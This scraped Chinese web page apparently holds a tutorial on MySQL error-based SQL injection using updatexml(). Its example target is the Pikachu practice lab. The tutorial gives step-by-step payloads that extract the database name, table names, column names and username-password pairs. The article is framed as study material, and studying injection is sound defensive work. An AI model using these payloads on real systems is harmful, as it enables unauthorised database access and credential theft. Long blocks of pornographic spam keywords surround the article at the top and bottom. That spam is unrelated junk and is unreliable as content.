日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術(shù)文章
文章詳情頁

詳解SQL報錯盲注

瀏覽:180日期:2023-03-06 14:25:14
目錄
  • 一、SQL報錯函數(shù)詳解
  • 二、SQL報錯盲注payload構(gòu)造
    • 1、updatexml語句構(gòu)造思路
    • 2、查詢當前數(shù)據(jù)庫
    • 3、查詢表名
    • 4、查詢列名
    • 5、查詢字段名
    • 6、查詢數(shù)據(jù)

今天繼續(xù)給大家介紹Linux運維相關(guān)知識,本文主要內(nèi)容是SQL報錯盲注詳解。

免責(zé)聲明:
本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴禁利用文中技術(shù)進行非法行為,否則造成一切嚴重后果自負!
再次強調(diào):嚴禁對未授權(quán)設(shè)備進行滲透測試!

一、SQL報錯函數(shù)詳解

updatexml();floor();extractvalue();等函數(shù)都可以用于構(gòu)造SQL報錯函數(shù),今天我們主要來講解使用updatexml()函數(shù)。
updatexml()函數(shù)使用格式如下:

updatexml(XML_document,XPath_string,new_value)

XML_document是String格式的XML文檔名稱,XPath_string是XPath格式的字符串,new_value是String格式的而字符串,用于替換查找到的符合條件的數(shù)據(jù)。
該函數(shù)有一個特性,即如果XPath_string不是XPath格式的字符串,就會報錯并顯示處XPath的值,因此,我們可以利用這一特性實現(xiàn)SQL報錯盲注。此外,我們還可以利用updatexml()函數(shù)的特性,實現(xiàn)在SQL插入、刪除等語句中的SQL注入。

二、SQL報錯盲注payload構(gòu)造

1、updatexml語句構(gòu)造思路

updatexml()函數(shù)的構(gòu)造,首先需要閉合SQL語句中的冒號、括號。其次還需要使用and或者or語句連接成一個單獨的語句,這樣即可成功執(zhí)行updatexml()函數(shù)中的語句。
下面,我以皮卡丘靶場為例,來簡單介紹一下updatexml報錯注入payload的構(gòu)造思路,皮卡丘靶場SQL insert/update型注入頁面如下所示:

從上圖中可以看出,該頁面功能上是提供人員的注冊,因此可以猜測其內(nèi)部是insert類型的SQL語句,因此我們可以在手機、住址等列(一般不要選擇密碼,因為很多網(wǎng)站都會把密碼進行md5處理,從而導(dǎo)致我們的updatexml失效)中插入我們的updatexml語句。通過簡單的實驗可以得知,該站點的注入閉合為單引號,因此payload的構(gòu)造格式為:

12" or updatexml() or"

2、查詢當前數(shù)據(jù)庫

當我們確定updatexml()函數(shù)的格式后,我們就可以寫實際的payload語句了,相關(guān)命令如下所示:

12"or updatexml(1,concat(0x7e,database(),0x7e),0) or"

從上payload可以看出,updatexml()函數(shù)有三部分組成,我們需要把我們要執(zhí)行的SQL語句寫到第二部分,第二部分是一個concat()函數(shù),之所以要拼接0x7e是因為該16進制字符是一個波浪線,也可以換成其他的字符。
該payload執(zhí)行結(jié)果如下所示:

從上圖可以看出,我們當前的數(shù)據(jù)庫名為pikachu。

3、查詢表名

查詢表名的payload如下所示:

12" or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),0) or "

在上述payload中,concat中間的SQL語句要用括號括起來,然后寫入正常的查詢命令即可,該payload執(zhí)行結(jié)果如下所示:

從上圖可以看出,我們查詢到當前數(shù)據(jù)庫存在一個名為httpinfo的表,如果我們更改limit的限制,那么我們可以得到更多的表。

4、查詢列名

查詢列名的payload如下所示:

12" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users"),0x7e),0) or "

該payload構(gòu)造原理與以上類似,執(zhí)行結(jié)果如下所示:

5、查詢字段名

字段名查詢的payload如下所示:

12" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="pikachu"),0x7e),0) or "

該payload構(gòu)造原理與以上類似,執(zhí)行結(jié)果如下所示:

6、查詢數(shù)據(jù)

數(shù)據(jù)查詢的payload如下所示:

12" or updatexml(1,concat(0x7e,(select concat(username,"-",password) from users limit 0,1),0x7e),0) or "

該payload構(gòu)造原理與以上類似,執(zhí)行結(jié)果如下所示:

到此這篇關(guān)于SQL報錯盲注詳解的文章就介紹到這了,更多相關(guān)SQL報錯盲注內(nèi)容請搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

標簽: MsSQL
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
欧美综合二区| 亚洲精品成人一区| 国产精品一页| 国产欧美日韩精品一区二区三区| 日韩高清在线观看一区二区| 国产精品久久久亚洲一区| 日韩国产欧美视频| 国产精品久久久久77777丨| 麻豆成人av在线| 日韩在线短视频| 国产精品美女久久久| 亚洲精品进入| 久久精品国产99国产| 精品成人免费一区二区在线播放| 最新日韩欧美| 国产欧美一区二区三区米奇| 91一区二区| 日韩在线a电影| 麻豆精品一区二区综合av| 群体交乱之放荡娇妻一区二区| 日韩午夜高潮| 欧美日韩a区| 欧洲精品一区二区三区| 久久福利毛片| 精品国产中文字幕第一页| 欧美二三四区| 日韩精品中文字幕一区二区| 国产福利91精品一区二区| 九一国产精品| 国产精品午夜一区二区三区| 欧美日韩中文一区二区| 91国内精品| 91精品国产自产在线观看永久∴| 亚洲精品少妇| 国产精品久久久久久久久久10秀| 黑丝一区二区三区| 久久国产精品色av免费看| 免费污视频在线一区| 欧美日韩亚洲国产精品| 免费在线小视频| 日韩激情网站| 欧美a级片一区| 久久精品av麻豆的观看方式| 欧美成人高清| 久久只有精品| 日韩精品亚洲aⅴ在线影院| 色吊丝一区二区| 国产乱码精品一区二区亚洲| 日韩午夜电影| 成人日韩精品| 美女免费视频一区| 黄色欧美日韩| 日本一区二区高清不卡| 亚洲精品乱码| 香蕉精品视频在线观看| 美日韩一区二区三区| 水野朝阳av一区二区三区| 久久久久久夜| 国产精品最新| 亚洲精品国产精品粉嫩| 午夜欧美精品| 久久精品动漫| 久久伊人亚洲| 日本成人一区二区| av成人国产| 999精品色在线播放| 久久99国产精品视频| 日韩一区二区三免费高清在线观看 | 成人一二三区| 日韩av影院| 亚洲三级网站| 免费精品视频| 婷婷亚洲五月色综合| 欧美日韩视频网站| 国内在线观看一区二区三区| 久久国产乱子精品免费女| 亚洲在线久久| 国产一级一区二区| 1000部精品久久久久久久久| 国产精品99一区二区三| 久久超级碰碰| 国产欧美成人| 91精品国产自产精品男人的天堂 | 日韩视频在线一区二区三区 | 亚洲精品国产嫩草在线观看| 久久香蕉精品香蕉| 国产日韩欧美高清免费| 亚洲精品成人一区| 男人的天堂久久精品| 亚洲制服少妇| 蜜桃一区二区三区在线| 日本欧洲一区二区| 妖精视频成人观看www| 亚洲女同一区| 爽爽淫人综合网网站| 欧美粗暴jizz性欧美20| 久久伦理在线| 99在线|亚洲一区二区| 日韩亚洲国产欧美| 天堂成人免费av电影一区| 亚洲欧美日韩综合国产aⅴ| 亚洲一级网站| 日韩专区欧美专区| 亚洲精品第一| 青青草精品视频| 国产精品二区影院| 国产成人调教视频在线观看| 涩涩av在线| 欧美日韩水蜜桃| 天使萌一区二区三区免费观看| 久久亚洲国产精品一区二区| 中文字幕日本一区二区| 最新国产精品| 国产精品一级在线观看| 精品国产99| 欧美色图一区| 日韩在线a电影| 久久国产免费看| 麻豆成人在线观看| 午夜影院一区| 亚洲美洲欧洲综合国产一区 | 久久久久久夜| 亚洲香蕉网站| 综合一区二区三区| 国产精品1区| 亚洲成av人片一区二区密柚| 免费在线看一区| 国产精品日本一区二区三区在线| 久久久久观看| 久久高清免费| 日韩欧美久久| 国产欧美一区二区三区精品酒店| 91成人精品视频| 欧美永久精品| 久久久久免费av| 天堂俺去俺来也www久久婷婷| 欧美精品成人| 国产综合亚洲精品一区二| 中文字幕乱码亚洲无线精品一区| 国产精品亚洲综合在线观看| 日韩欧美一区二区三区免费观看| 亚洲少妇诱惑| 国产精品一区二区美女视频免费看 | 婷婷丁香综合| 日韩高清成人在线| 日韩精品第一区| 四虎精品一区二区免费| 成人在线免费观看网站| 最新亚洲一区| 精品国产乱码久久久| 久久中文字幕av| 7m精品国产导航在线| 韩国精品主播一区二区在线观看| 日韩中出av| 久久人人88| 国产精品免费大片| 日韩一级不卡| a天堂资源在线| 日韩精品1区2区3区| 久久免费大视频| 久久精品亚洲| 日韩欧美久久| 亚洲免费成人| 日韩毛片视频| 国产精品巨作av| 亚洲欧美日韩专区| 成人va天堂| 精品72久久久久中文字幕| 蜜桃视频一区二区| av亚洲一区二区三区| 国产精品大片| 亚洲毛片在线免费| 91久久国产| 日韩中文在线播放| 麻豆一区二区在线| 日韩高清二区| 视频一区日韩精品| 99在线精品免费视频九九视| 成人国产综合| 麻豆国产欧美日韩综合精品二区| 丝袜亚洲另类欧美| 久久久久久久久丰满| 国产成人精品福利| 国产美女精品视频免费播放软件| 日韩在线一区二区| 国产综合激情| 久久久久久久久丰满| 91免费精品| 精品视频一区二区三区在线观看 | 欧美一区二区三区免费看| 欧美日韩国产亚洲一区| 中文在线资源| 福利视频一区| 国产高清亚洲| 日本aⅴ亚洲精品中文乱码| 亚洲一区有码| 婷婷精品久久久久久久久久不卡| 免费在线看一区| 丝袜国产日韩另类美女| 羞羞答答国产精品www一本|